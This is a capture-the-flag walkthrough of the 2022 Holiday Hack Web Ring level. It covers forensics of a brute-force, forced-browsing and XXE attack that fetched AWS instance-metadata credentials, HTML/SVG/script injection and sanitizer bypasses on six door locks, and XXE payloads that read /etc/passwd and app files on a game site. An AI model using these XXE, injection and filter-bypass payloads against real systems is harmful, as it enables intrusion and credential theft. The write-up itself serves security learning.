Orienting

On the next level down, I’ll find Tangle Coalbox outside the Web Ring with a warning about Sporcs:

image-20230104134212236

Hey there, Gumshoe. Tangle Coalbox here again.

Morcel told you all about the Flobbits, right? Well, be careful ahead.

Once thought to be the stuff of myths, the Sporcs truly are real, and as mean as they are in the stories.

Once we gained the Flobbits’ trust, they taught us all about the Sporcs. They, too, were part of the Great Schism.

They were another people who split off from the colony of Frostians in Oz, though, they’re more closely related to the trolls.

The Flobbits, on the other hand, are more like the Munchkins. Like the Flobbits, the Sporcs appear when the rings are at risk.

Digging far down into the ground causes them to emerge, too. Seems we created a perfect storm. Whoops!

They’re definitely up to no good, and trying to get the Rings for themselves. Tread lightly, friend, and good luck!

Four Forensics Tasks

Challenge

Alabaster Snowball is standing alone in a relatively dark tunnel:

image-20230104134622616

Hey there! I’m Alabaster Snowball

And I have to say, I’m a bit distressed.

I was working with the dwarves and their Boria mines, and I found some disturbing activity!

Looking through these artifacts, I think something naughty’s going on.

Can you please take a look and answer a few questions for me?

First, we need to know where the attacker is coming from.

If you haven’t looked at Wireshark’s Statistics menu, this might be a good time!

There’s no terminal, but he does give a link to download some artifacts, which come as boriaArtifacts.zip, and contains two files, a PCAP and a weberror.log file.

There’s also a new hint (and three more that unlock after solving each challenge):

  • The victim web server is 10.12.42.16. Which host is the next top talker?
  • The site’s login function is at /login.html. Maybe start by searching for a string.
  • With forced browsing, there will be many 404 status codes returned from the web server. Look for 200 codes in that group of 404s. This one can be completed with the PCAP or the log file.
  • AWS uses a specific IP address to access IMDS, and that IP only appears twice in this PCAP.

The badge has four open tasks associated with these artifacts:

  • Use the artifacts from Alabaster Snowball to analyze this attack on the Boria mines. Most of the traffic to this site is nice, but one IP address is being naughty! Which is it? Visit Sparkle Redberry in the Tolkien Ring for hints.
  • The first attack is a brute force login. What’s the first username tried?
  • The next attack is forced browsing where the naughty one is guessing URLs. What’s the first successful URL path in this attack?
  • The last step in this attack was to use XXE to get secret keys from the IMDS service. What URL did the attacker force the server to fetch?

Video Solution

I’ll show walking through all four of these in this video:

Naughty IP

Orienting in the PCAP

Looking at the Statistics -> Conversations shows that the webserver being attacked is at 10.12.42.16. Every stream is some IP talking to this one:

image-20230104161033807

Most of those are on port 80:

image-20230104161104909

Sorting by most interaction, 18.222.86.32 stands out as having sent by far the most traffic to the server:

image-20230104161204071

Looking at Statistics -> Protocol Hierarchy, the traffic is all HTTP, with some of that being Form submissions:

image-20230104161307330

Form Data

Form submissions are interesting, as they are often a vector to attack. I’ll filter on these to see they are all from the IP above, 18.222.86.32:

image-20230104161518513

The body of the POST requests show a username and password, like this one:

image-20230104162018312

This is clearly a brute force attack, and solidifies the answer.

I can see similar results in the web log data. 18.222.86.32 is the most common IP:

$ cat weberror.log | cut -d' ' -f1 | grep . | sort | uniq -c | sort -nr 
   1384 18.222.86.32
    136 52.15.98.99
    131 18.222.86.46
    131 18.216.39.196
    129 3.19.71.188
...[snip]...

And there are some GET requests before tons of POST requests to /login.html:

$ cat weberror.log | grep -F '18.222.86.32' | head -30
18.222.86.32 - - [05/Oct/2022 16:44:53] "GET / HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:45:58] "GET /aboutus.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:03] "GET /admin.html HTTP/1.1" 302 -
18.222.86.32 - - [05/Oct/2022 16:46:03] "GET / HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:08] "GET /aboutus.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:12] "GET /login.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:16] "GET /aboutus.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:18] "GET /aboutus.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:22] "GET /aboutus.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:24] "GET /aboutus.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:29] "GET /login.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:33] "GET /login.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:35] "GET /admin.html HTTP/1.1" 302 -
18.222.86.32 - - [05/Oct/2022 16:46:35] "GET / HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:39] "GET / HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:41] "POST /login.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:41] "POST /login.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:41] "POST /login.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:41] "POST /login.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:41] "POST /login.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:41] "POST /login.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:41] "POST /login.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:41] "POST /login.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:41] "POST /login.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:41] "POST /login.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:41] "POST /login.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:41] "POST /login.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:41] "POST /login.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:41] "POST /login.html HTTP/1.1" 200 -
18.222.86.32 - - [05/Oct/2022 16:46:41] "POST /login.html HTTP/1.1" 200 -
...[snip]...
image-20230104161855461

Credential Mining

The next question asks me to look at the brute force, and submit the first username submitted. I’ve already got this lined in up Wireshark. Making sure to pick the first POST to /login.html, I’ll see the payload:

image-20230104162103036

The answer is “alice”:

image-20230104162120716

404 FTW

Now there’s a forced browsing (or directory brute force) attack. I’ll note this in the web logs, just after the POSTs stop:

image-20230104162214529

All these 404s so closely together suggest a tool like feroxbuster or gobuster, etc.

I can look at these packets in Wireshark to see if the User-Agent String gives it away, but it’s set to look like Firefox:

image-20230104162347655

Towards the bottom of the logs associated with 18.222.86.32, there’s a 200 request to /proc, before it starts sending POST requests to /proc:

image-20230104162444441

The answer here is “/proc”:

image-20230104162503259

Alabaster

IMDS, XXE, and Other Abbreviations

IMDS is the AWS Instance Metadata Service, an API which is available in EC2 instances at the IP 169.254.169.254.

XXE is a type of attack against servers that read XML input.

I’ll use the following Wireshark filter to get HTTP requests and responses from the malicious IP:

ip.addr==18.222.86.32 and (http.request or http.response)

Looking at those POST requests to /proc, there’s a clear XXE attack going on:

image-20230104162856744

This first one doesn’t return anything, but the next payload does:

image-20230104162921731

In the response, where it was foo, now it shows /etc/passwd:

image-20230104162946455

The attacker uses XXE to get the local IP from icanhazip.com, and then starts enumerating the IMDS, eventually get the security credentials from this request:

image-20230104163119417

The response has the keys:

image-20230104163148325

The answer is http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance.

image-20230104163222880

Boria Mine Door

Hints

There’s a new task to talk to Alabaster:

Fantastic! It seems simpler now that I’ve seen it once. Thanks for showing me!

Hey, so maybe I can help you out a bit with the door to the mines.

First, it’d be great to bring an Elvish keyboard, but if you can’t find one, I’m sure other input will do.

Instead, take a minute to read the HTML/JavaScript source and consider how the locks are processed.

Next, take a look at the Content-Security-Policy header. That drives how certain content is handled.

Lastly, remember that input sanitization might happen on either the client or server ends!

There’s two additional hints in the badge:

  • The locks take input, render some type of image, and process on the back end to unlock. To start, take a good look at the source HTML/JavaScript.
  • Understanding how Content-Security-Policy works can help with this challenge.

Challenge

Further into the cave, Hal Tandybuck is standing near a Cranberry Pi and a locked door:

image-20230104164317250

Oh hi, I’m Hal Tandybuck. And who might you be?

I’m hanging out by the door to the mines here because, well, I haven’t figured out the locks yet.

It actually reminds me of this locked crate I had three years ago…

I doubt we’ll get much in the way of debug output.

Think you can help me get through?

The Pi opens this console:

image-20230104164423088

On clicking “Got it.”, the six locks are presented:

image-20230104164445595

On entering text into any of the boxes and hitting “GO”, that text is rendered back as an image in the black space below:

image-20230104164553095

General Analysis

HTML Structure

The page, like all terminals and challenges, is an iframe inside the main HHC page:

image-20230104204614886

Inside that page, each lock is its own iframe:

image-20230104204706623

Each lock (or “pin”) has a form with an input and a button, and a div of class="output" and an img with class="captured".

Network Traffic

When I send text to one of the locks, it sends a POST to /pinX (where X is the number) with a body of inputTxt=[text]. The response is very similar to what’s already there, but it includes a new JavaScript include:

<script src='js/ee89026a6c5603c51b4504d218ac60f6874b7750.js'></script>

The hash name of the file before .js changes each time, though the same text returns the same hash, so it is likely a SHA1 generated with some kind of secret salt and the input text.

That JavaScript sets a results object:

const results = {
  "questionIndex": 1,
  "completed": false,
  "attemptHash": "ee89026a6c5603c51b4504d218ac60f6874b7750",
  "wires": [
    {
      "color": [
        255,
        255,
        255
      ],
      "path": []
    }
  ],
  "token": null
};

pin.js then sets the image to be [hash].png:

if (typeof results !== 'undefined') {
    document.querySelector('img.captured').src = `images/${results.attemptHash}.png`;
    document.body.classList.add('capture');
    window.parent.postMessage(JSON.stringify(results), '*');
    console.log('COMPLETED:', results.completed);
    if (results.completed) {
        document.body.classList.add('completed');
        document.querySelector('.output').innerText = 'Unlocked!';
        document.querySelector('input').disabled = true;
        document.querySelector('button').disabled = true;
    }
}

and [hash].png is the rendered text as an image:

img

Lock 1

I need to connect the two white pipes with text, like in the example. A bunch of & will actually do it just fine:

image-20230104170423910

Going a bit deeper, I’ll look at the dev tools page Elements tab, and see that each lock is an iframe:

image-20230104170730681

The first “pin” has a comment under the form:

image-20230104170804651

That solves it as well:

image-20230104170855330

Lock 2

Source Analysis

The pin2 iframe has a different comment under the form:

image-20230104205047533

HTML Injection

The server is taking my text and using it to generate an image. It’s worth seeing what happens if I send HTML.The solution could be as simple as sending a div with a white background:

<div style="width: 200px; height: 200px; background: white;"></div>

This returns a white image that fills the lock, and completes the challenge:

image-20230104205306386

SVG Background

To make more complicated shapes, I’ll turn to SVGs. There’s a nice SVG Tutorial on the Mozilla docs page. Basically, an SVG allows the user to define points and shapes in text that are then rendered by a browser.

svgviewer.dev allows me to generate SVGs and immediately see what they render to. First I need to define the canvas size. In Chrome dev tools, I’ll see that the iframe is set to 200px x 200px:

image-20230104172534295

I’ll set it to that, and then add a green circle (from the tutorial page):

image-20230104172659157

That payload is:

<svg width="200" height="200">
    <circle cx="100" cy="100" r="80" fill="green" />
</svg>

I’ll paste that into one of the locks, and the SVG does render:

image-20230104172752278

That means I can inject more complicated images.

Solve with SVG

To solve the lock, I’ll generate an SVG that will connect the two pipes. This page is the docs for a line. I’ll make a line:

image-20230104173326689

It’s important to set the background to dark so I can see it.

stroke-width will make it thicker:

image-20230104173408222

Entering that into lock 2 is a bit off:

image-20230104173503315

I’ll adjust the payload to this:

<svg width="200" height="200">
    <line x1="0" y1="75" x2="200" y2="150" stroke="white" stroke-width="20" />
</svg>

Which solve the challenge:

image-20230104173700319

Lock 3

Source Analysis

“pin3” has a new comment in the form:

image-20230104205911356

This is a hint to send JavaScript.

Solve JavaScript

I’ll use a script tag to have JavaScript that sets the background color to blue:

<script>document.body.style.backgroundColor = "blue";</script>

I can set the full body as that’s what’s being rendered here. It works:

image-20230104210023783

Interestingly, for reasons I don’t totally understand, this doesn’t work on lock 2. If I send this exact payload to the first three locks, only 2 doesn’t work:

image-20230104210114460

There must be some server-side filtering of JavaScript for pin2.

Solve with SVG

With the power of SVG at my disposal, I can solve this one very similarly to how I solved lock 3, just making the stroke blue and moving the y values:

<svg width="200" height="200">
    <line x1="0" y1="100" x2="200" y2="10" stroke="blue" stroke-width="20" />
</svg>
image-20230104173825903

Success

On solving the third lock, the challenge is actually complete!

image-20230104213220477

Hal appreciates the help, and offers some hints for the next challenge, as well as encourages me to finish the remaining locks:

Great! Thanks so much for your help!

When you get to the fountain inside, there are some things you should consider.

First, it might be helpful to focus on Glamtariel’s CAPITALIZED words.

If you finish those locks, I might just have another hint for you!

Lock 4

Blocked by Filter

For the forth lock, it seems like I need two lines, one white and one blue. I’ll come up with something like this:

<svg width="200" height="200">
    <line x1="0" y1="50" x2="200" y2="50" stroke="white" stroke-width="20" />
    <line x1="0" y1="120" x2="200" y2="120" stroke="blue" stroke-width="20" />
</svg>

When I submit that, it returns an unexpected result:

image-20230104174352971

It seems that the < and first " are removed. There’s some kind of filtering.

Source Analysis

Looking at the client-side source for the page, I’ll see that pin4 has some extra stuff:

image-20230104174537036

The input field has an onblur to call sanitizeInput(). That function is defined in the head section:

image-20230104174807210

onblur runs when I click out of the input box (on the “GO” button, for example), calling sanitizeInput, which gets the contents of the box and calls .replace four times, to remove "'<> from the value.

Bypass Filter

replace only replaces the first value, which is why the first " is missing in the resulting image, but not the latter ones. So I can just add the characters I need to the front of the string, like this (and after a couple of adjustments to y values), it solves:

<>"<svg width="200" height="200">
    <line x1="0" y1="50" x2="200" y2="50" stroke="white" stroke-width="20" />
    <line x1="0" y1="130" x2="200" y2="130" stroke="blue" stroke-width="20" />
</svg>
image-20230104175127066

Lock 5

Enhanced Filter

Sending the payload that solved lock 4 to lock 5 returns:

image-20230104175303417

Lock 5 has the same kind of filtering, but this time it’s using regex to remove all instances.

const sanitizeInput = () => {
    const input = document.querySelector('.inputTxt');
    const content = input.value;
    input.value = content
        .replace(/"/gi, '')
        .replace(/'/gi, '')
        .replace(/</gi, '')
        .replace(/>/gi, '');
}

onblur

To bypass this, I’ll focus more on the trigger than the sanitizeInput function itself:

<input class="inputTxt" name="inputTxt" type="text" value="" autocomplete="off" onblur="sanitizeInput()">

The input has the onblur attribute. From the Mozilla docs:

The blur event fires when an element has lost focus. The event does not bubble, but the related focusout event that follows does bubble.

So if I start with a string like this:

image-20230104210716839

As soon as I click anywhere else, it updates to:

image-20230104210732367

However, if I hit enter, the focus never leaves, and the form submits:

image-20230104210808400

Solve with SVG

Now I just need an SVG with two lines, and to get the x and ys lined up right. This works:

<svg width="200" height="200">
    <line x1="0" y1="140" x2="200" y2="40" stroke="red" stroke-width="20" />
    <line x1="30" y1="165" x2="200" y2="95" stroke="blue" stroke-width="20" />
</svg>
image-20230104211259922

Lock 6

Lock 6 is actually very simple, since I’m already working with SVGs. There’s no filtering. So at first, something like this seems like it should work:

<svg width="200" height="200">
    <line x1="0" y1="35" x2="200" y2="35" stroke="green" stroke-width="20" />
    <line x1="0" y1="75" x2="200" y2="110" stroke="red" stroke-width="20" />
    <line x1="0" y1="115" x2="200" y2="200" stroke="blue" stroke-width="20" />
</svg>

But it doesn’t light the top green sensor:

image-20230104211754410

I’ll grab wiring.png from here:

I can open it in Gimp and use the dropper tool to set that green as the foreground color, and then look at it:

image-20230104212235756

I’ll update the SVG:

<svg width="200" height="200">
    <line x1="0" y1="35" x2="200" y2="35" stroke="#00ff00" stroke-width="20" />
    <line x1="0" y1="75" x2="200" y2="110" stroke="red" stroke-width="20" />
    <line x1="0" y1="115" x2="200" y2="200" stroke="blue" stroke-width="20" />
</svg>
image-20230104212420883

Alternatively, this reference shows that #00ff00 is “lime”, and that works too.

With that, the door is completely unlocked:

image-20230104212626520

Glamtariel’s Fountain

Hints

Hal is shocked:

Wha - what?? You opened all the locks?! Well then…

Did you see the nearby terminal with evidence of an XXE attack?

Maybe take a close look at that kind of thing.

It unlocks new hints in the badge as well:

  • Sometimes we can hit web pages with XXE when they aren’t expecting it!
  • Early parts of this challenge can be solved by focusing on Glamtariel’s WORDS.

Challenge

On the other side of the door I’ll find Akbowl looking at a “fountain”:

image-20230104213700621

Huh - what? Why do you disturb Akbowl?

I’m trying to get the ring in here for the Sporc Chief.

Unlucky for me it’s lost in this water basin thing.

You will not get it out before Akbowl!

The fountain is a link, and clicking on it opens glamtarielsfountain.com in a new tab:

image-20230104213958729

Enumeration

Capitalized Words

The site has Glamtariel, a fountain, and four objects at the top right. I can drag an object onto either and drop them, and it changes what they say. For example, if I drag santa into Glamtariel:

image-20230104225607269

Dragging santa onto the fountain leads to something different:

image-20230104225631905

After dragging each item onto each character, the four items change, and then again, showing 12 items in total. Dragging these items around produces a bunch of statements from each character. I’ll note all the capitalized words, as well as some other important statements:

  • The capitalized words are: TAMPER, PATH, TYPE, APP, TRAFFIC FILES, SIMPLE FORMAT, AND RINGLIST.
  • There’s talk of tampering with cookies.
  • APP and PATH appear in the same response. These two will go together.
  • Glamtariel says “I keep a list of all my rings in my RINGLIST file.”

Traffic Analysis

When I drop an item on a character, it sends a POST request to /dropped with a JSON payload:

POST /dropped HTTP/2
Host: glamtarielsfountain.com
Cookie: GCLB="7f7e33fd36350c83"; MiniLembanh=014e6ef2-5b01-4b56-8491-7dc11a93afa4.HcLoZGbrhSqavRGTgkrkBrq5k4A
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Grinchum: IjNmNmY3MmVjYzJhNzQ5YmFkN2FmNjg0ZTM5ZDIxYmZhN2FhZjNlMDYi.Y7a3xw.x8RATlO44QmXq75F51mH9uLolyk
Content-Length: 52
Origin: https://glamtarielsfountain.com
Referer: https://glamtarielsfountain.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"imgDrop":"img2","who":"princess","reqType":"json"}

The “Snack” shown on the page is sent as the MiniLembanh cookie, and the “Ticket” is sent as the X-Grinchum header.

The response body has JSON, with the appResp holding both characters responses, separated by ^:

HTTP/2 200 OK
Server: Werkzeug/2.2.2 Python/3.10.8
Date: Thu, 05 Jan 2023 11:43:07 GMT
Content-Type: application/json
Content-Length: 259
Set-Cookie: MiniLembanh=014e6ef2-5b01-4b56-8491-7dc11a93afa4.HcLoZGbrhSqavRGTgkrkBrq5k4A; Domain=glamtarielsfountain.com; Path=/
Via: 1.1 google
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000

{
  "appResp": "I don't know why anyone would ever ask me to TAMPER with the cookie recipe. I know just how Kringle likes them.^Glamtariel likes to keep Kringle happy so that he and the elves will visit often.",
  "droppedOn": "princess",
  "visit": "none"
}

I’ll note it’s a Python webserver.

Cookies

There’s a hint about tampering with cookies. If I use Burp Proxy to intercept a request and mess with the MiniLembanh cookie at all, Grinchum appears:

image-20230105074351771

Looking at the response, it has the visit field set:

{
  "appResp": "Trying to TAMPER with Kringle's favorite cookie recipe or the entrance tickets can't help you Grinchum! I'm not sure what you are looking for but it isn't here! Get out!^Miserable trickster! Please click him out of here.",
  "droppedOn": "none",
  "visit": "static/images/grinchum-supersecret_9364274.png,265px,135px"
}

There was one other time the visit field gets set, when it has a weird eye thing loaded in the responses that comes from dropping the grey ring on the fountain:

image-20230105074440118

That response looks like:

{
  "appResp": "Careful with the fountain! I know what you were wondering about there. It's no cause for concern. The PATH here is closed!^Between Glamtariel and Kringle, many who have tried to find the PATH here uninvited have ended up very disAPPointed. Please click away that ominous eye!",
  "droppedOn": "fountain",
  "visit": "static/images/stage2ring-eyecu_2022.png,260px,90px"
}

These are useful for getting the path, static/images, which I’ll need later.

(Not really) XXE POC

JSON -> XML

I’ve got multiple hints at this point to look for XXE. As XXE is a XML attack, the first thing I need to do is figure out how to get the site to accept XML.

Online converters like this one will convert the JSON body to XML, and I’ll update the reqType from json to xml.:

<?xml version="1.0" encoding="UTF-8" ?>
<root>
	<imgDrop>img2</imgDrop>
	<who>princess</who>
	<reqType>xml</reqType>
</root>

I’ll send the POST request to Burp Repeater, and play with it. If I add this as the body, and send without changing anything else, the response is basically a failure:

{
  "appResp": "Sorry, we dont quite understand what you were trying to share.^Sorry, we dont quite understand what you were trying to share.",
  "droppedOn": "none",
  "visit": "none"
}

That’s because I need to change the Content-Type header from application/json to application/xml. Once I do that, there’s a different response:

{
  "appResp": "Zoom, Zoom, very hasty, can't do that yet!^Zoom, Zoom, very hasty, can't do that yet!",
  "droppedOn": "none",
  "visit": "none"
}

Once I drag enough items around, eventually, the same request will work, returning the same stuff as the JSON version.

XXE-ish

The part about this challenge that gets really frustrating is that the application is not actually vulnerable to XXE.

Think about how XXE works. I submit some values, but in place of one of them, I give a variable (or entity) that loads something, and then hopefully that field is displayed back to me. If it’s not, I’ll have blind XXE where I have to rely on some kind of exfil back to my host. The only potential for a field to be displayed back to me would be in the droppedOn value in the response.

I’ve already noted that the application is aware of at least XML, and has some triggers for when I’m allowed to use it. The entire application is not exploitable by XXE, but rather looking for various XXE payloads and responding if it sees them. It’s important to keep this in mind and do a lot of guessing to figure out what the application is looking for, and you can’t use what you know about a typical XXE to test hypothesises.

I’ll add an XXE attack with something like this:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE root[<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
	<imgDrop>img2</imgDrop>
	<who>&xxe;</who>
	<reqType>xml</reqType>
</root>

This would put the contents of /etc/passwd into maybe the droppedOn output. It fails:

{
  "appResp": "There's no one else here who can understand and communicate like that except me.^Well, I understand a bit, but can't communicate with it at all.",
  "droppedOn": "none",
  "visit": "none"
}

Thinking of this as a game and not an exploit, I think there’s a clue there that the attack must target someone “who understands”. I’ll move the &xxe; to imgDrop and put princess back in who:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE root[<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
	<imgDrop>&xxe;</imgDrop>
	<who>princess</who>
	<reqType>xml</reqType>
</root>

This returns:

{
  "appResp": "Sorry, we dont know anything about that.^Sorry, we dont know anything about that.",
  "droppedOn": "none",
  "visit": "none"
}

Guessing a Path

At this point, I have to guess the path that the XXE game is looking for. The hints include APP, SIMPLE FORMAT, and references to a RINGLIST file. For some reason, this file is in static/images, and I’ll need the full path, which is in /app. I would expect a simple file format to have no extension, or something like .txt. Putting all this together with a lot of guessing, I’m able to get a different response when I try to read /app/static/images/ringlist.txt with this payload:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE root[<!ENTITY xxe SYSTEM "file:///app/static/images/ringlist.txt" >]>
<root>
	<imgDrop>&xxe;</imgDrop>
	<who>princess</who>
	<reqType>xml</reqType>
</root>

The response says:

{
  "appResp": "Ah, you found my ring list! Gold, red, blue - so many colors! Glad I don't keep any secrets in it any more! Please though, don't tell anyone about this.^She really does try to keep things safe. Best just to put it away. (click)",
  "droppedOn": "none",
  "visit": "static/images/pholder-morethantopsupersecret63842.png,262px,100px"
}

Following the Clues

Find Silver Ring

Now that I have found a foothold in the game, I’ll look more closely at the visit image:

The folder is labeled x_phial_pholder_2022 and the paper says bluering.txt and redring.txt.

A bit more guessing and on trying to read /app/static/images/x_phial_pholder_2022/bluering.txt:

{
  "appResp": "I love these fancy blue rings! You can see we have two of them. Not magical or anything, just really pretty.^She definitely tries to convince everyone that the blue ones are her favorites. I'm not so sure though.",
  "droppedOn": "none",
  "visit": "none"
}

Similarly with /app/static/images/x_phial_pholder_2022/redring.txt

{
  "appResp": "Hmmm, you still seem awfully interested in these rings. I can't blame you, they are pretty nice.^Oooooh, I can just tell she'd like to talk about them some more.",
  "droppedOn": "none",
  "visit": "none"
}

Neither of these help me much, but if these two rings are in this folder, could there be others? goldring.txt doesn’t return anything, but silverring.txt does:

{
  "appResp": "I'd so love to add that silver ring to my collection, but what's this? Someone has defiled my red ring! Click it out of the way please!.^Can't say that looks good. Someone has been up to no good. Probably that miserable Grinchum!",
  "droppedOn": "none",
  "visit": "static/images/x_phial_pholder_2022/redring-supersupersecret928164.png,267px,127px"
}

The image of the red ring has another path on it:

goldring_to_be_deleted.txt.

Changing the XXE

Reading gold_ring_to_be_deleted.txt returns a response with some capitalized terms:

{
  "appResp": "Hmmm, and I thought you wanted me to take a look at that pretty silver ring, but instead, you've made a pretty bold REQuest. That's ok, but even if I knew anything about such things, I'd only use a secret TYPE of tongue to discuss them.^She's definitely hiding something.",
  "droppedOn": "none",
  "visit": "none"
}

This involves a lot more guessing, but I believe the hint here is to look at the request, and try using a different TYPE. The trick is to actually put the XXE payload in the reqType field. For reasons that I don’t understand, the imgDrop must be img1 for this to work as well. That gives this payload:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE root[<!ENTITY xxe SYSTEM "file:///app/static/images/x_phial_pholder_2022/goldring_to_be_deleted.txt" >]>
<root>
	<imgDrop>img2</imgDrop>
	<who>princess</who>
	<reqType>&xxe;</reqType>
</root>

This returns:

{
  "appResp": "No, really I couldn't. Really? I can have the beautiful silver ring? I shouldn't, but if you insist, I accept! In return, behold, one of Kringle's golden rings! Grinchum dropped this one nearby. Makes one wonder how 'precious' it really was to him. Though I haven't touched it myself, I've been keeping it safe until someone trustworthy such as yourself came along. Congratulations!^Wow, I have never seen that before! She must really trust you!",
  "droppedOn": "none",
  "visit": "static/images/x_phial_pholder_2022/goldring-morethansupertopsecret76394734.png,200px,290px"
}

Glamtariel is giving me the golden ring:

“goldring-morethansupertopsecret76394734.png” solves the challenge:

image-20230105073703425

Story

I’ve now recovered the third ring, the Web Ring:

image-20230105074951719

The story is at 56%:

image-20230105075015227

Five Rings for the Christmas king immersed in cold

Each Ring now missing from its zone

The first with bread kindly given, not sold

Another to find ‘ere pipelines get owned

One beneath a fountain where water flowed

Akbowl is not happy:

No! That’s not yours!

This birdbath showed me images of this happening.

But I didn’t believe it because nobody is better than Akbowl!

Akbowl’s head is the hardest! That’s what the other sporcs tell me.

I guess Akbowl’s head is not the smartest.

Grinchum is here too:

image-20230105075138337

😏 First lost… second lost… third lost. 😟

Where are they? 😦 WHERE ARE THEY, preciouses?

No! Aaargh! Lost!

😖 You - naggy human. Musn’t bother us. 😱 Not its business! grinchum..grinchum